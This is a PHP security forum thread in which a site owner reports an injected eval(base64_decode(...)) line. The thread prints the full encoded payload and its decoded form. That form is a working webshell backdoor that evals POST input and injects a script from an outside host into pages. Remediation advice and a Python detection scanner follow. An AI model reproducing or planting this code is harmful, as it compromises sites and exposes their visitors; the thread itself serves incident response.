<?php eval(base64_decode('aWYoI....)); ?> Is website hacked?

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Post by nehrav »

Hi,

I want advice on this from experts.

Some of my web documents are showing

Code: Select all

<?php eval(base64_decode('aWYoIWZ1......a long thread of code.............')); ?>
added automatically :banghead: in the first line of my web pages, on uploading them to the server :dubious: ,
whereas I haven't added any code of this sort on my own.

Does anybody have an idea why it's reacting so strangely.... :crazy:

Post by onion2k »

That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.

Post by nehrav »

onion2k wrote: That doesn't look good, but what it's actually doing depends on what the code is. Post it in full here (in

Code: Select all

or

Code: Select all

tags) and one of us will tell you exactly what it is.


Thanks for your quick reply onion, but is it safe to post it here? Secondly, is it somewhere related to website hacking??

Post by Apollo »

Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.

Post by pickle »

Yes it's safe to post. As long as the eval() isn't executed (PHP code that is posted isn't executed), there's no harm. My guess is it's an iframe of some sort.

Post by nehrav »

OK, then the code automatically added on my index page is

Code: Select all

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygndXEyJykpe2Z1bmN0aW9uIHVxMigkcyl7aWYocHJlZ19tYXRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjcmlwdD4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF1hcyR2KWlmKHByZWdfbWF0Y2goJyNbXC4gXXdpZHRoXHMqPVxzKltcJyJdPzAqWzAtOV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzWmhjMkZwYTJGeUxtOXlaeTl0WVcxaWIzUnpMM05sWVhKamFDNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gdXEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJHVxMjE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJHVxMjEpKWNhbGxfdXNlcl9mdW5jKCR1cTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd1cTInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2Ukc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCd1cTInKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kdXEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigndXEyMicpKSE9J3VxMjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?>
Please help me, as I have no idea about this. I am new to PHP...

Post by nehrav »

Apollo wrote: Yep, your website or server got hacked. Better change your passwords immediately, re-upload your site completely, and inform your hosting provider.
Which password do I need to change, FTP or database or something else???

Post by Apollo »

nehrav wrote: Which password do I need to change, FTP or database or something else???
ALL!

Your account has been compromised. So better change any password you have that is related to this account.

Post by josh »

Code: Select all

if(!function_exists('uq2')){function uq2($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]as$v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0]as$v)if(preg_match('#[\. ]width\s*=\s*[\'"]?0*[0-9][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3Zhc2Fpa2FyLm9yZy9tYW1ib3RzL3NlYXJjaC5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s,1);elseif(strpos($s,'<a'))$s=$a.$s;return$s;}function uq22($a,$b,$c,$d){global$uq21;$s=array();if(function_exists($uq21))call_user_func($uq21,$a,$b,$c,$d);foreach(@ob_get_status(1)as$v)if(($a=$v['name'])=='uq2')return;elseif($a=='ob_gzhandler')break;else$s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('uq2');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$uq2l=(($a=@set_error_handler('uq22'))!='uq22')?$a:0;eval(base64_decode($_POST['e']));
Which has the result of appending

Code: Select all

<script src=http://vasaikar.org/mambots/search.php ></script>
to the end of your body tag. And that URL gives me a 404; it probably returned the real code. The hacker did it this way so that after he took it down there was no trace of what he did.

Post by nehrav »

@Josh, what does this code mean & what is the hacker trying to do??

Please suggest how I can avoid this :banghead: ??

Post by kaisellgren »

Clean up everything you can find on the server, change all passwords (and possibly usernames too), update all software you have running there and avoid using less popular and unknown scripts/software. If it does not get better, you would be better off asking someone to take care of it for you.
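
Added example, not part of the original thread or any poster's code: a Python sketch of the cleanup step for the stub discussed above. It finds files that begin with an `eval(base64_decode('...'))` block, decodes the payload for reading without executing it, and flags the two behaviours visible in the decoded sample. All function names are hypothetical, and the sample is constructed with an inert `example.invalid` host.

```python
import base64
import re
from pathlib import Path

# Stub from this thread: eval(base64_decode('...')) prepended to a page.
STUB = re.compile(
    rb"\A\s*<\?php\s+eval\(\s*base64_decode\(\s*(['\"])([A-Za-z0-9+/=\s]+)\1"
    rb"\s*\)\s*\)\s*;\s*\?>[ \t]*\r?\n?")
# base64_decode('literal') calls nested inside a decoded payload.
NESTED = re.compile(rb"base64_decode\(\s*(['\"])([A-Za-z0-9+/=]+)\1\s*\)")
REQ_EVAL = re.compile(rb"eval\(\s*base64_decode\(\s*\$_(POST|GET|REQUEST|COOKIE)")

def split_stub(data):
    """Return (payload, rest); payload is decoded for reading, never run."""
    m = STUB.match(data)
    if not m:
        return None, data
    return base64.b64decode(m.group(2)), data[m.end():]

def nested_literals(payload):
    """Decode base64 string literals inside the payload (one level)."""
    return [base64.b64decode(m.group(2)) for m in NESTED.finditer(payload)]

def indicators(payload):
    """Flag the two behaviours visible in the thread's decoded sample."""
    found = []
    if REQ_EVAL.search(payload):
        found.append("request-driven eval")
    if any(re.search(rb"<(script|iframe)", lit, re.I)
           for lit in nested_literals(payload)):
        found.append("script/iframe injection")
    return found

def scan_tree(root, exts=(".php", ".html", ".htm")):
    """Map each file under root that starts with the stub to its indicators."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            payload, _ = split_stub(path.read_bytes())
            if payload is not None:
                hits[str(path)] = indicators(payload)
    return hits

# Constructed sample with the same shape as the posted stub (inert host name).
INNER = b"<script src=//example.invalid/x.js></script>"
BODY = (b"$a=base64_decode('" + base64.b64encode(INNER) +
        b"');eval(base64_decode($_POST['e']));")
SAMPLE = b"<?php eval(base64_decode('" + base64.b64encode(BODY) + b"')); ?>\n<html></html>\n"
```

The second element returned by `split_stub` is the file content with the injected first line removed. The scan only recognises this prepended form, so a file that comes back clean may still carry a different injection.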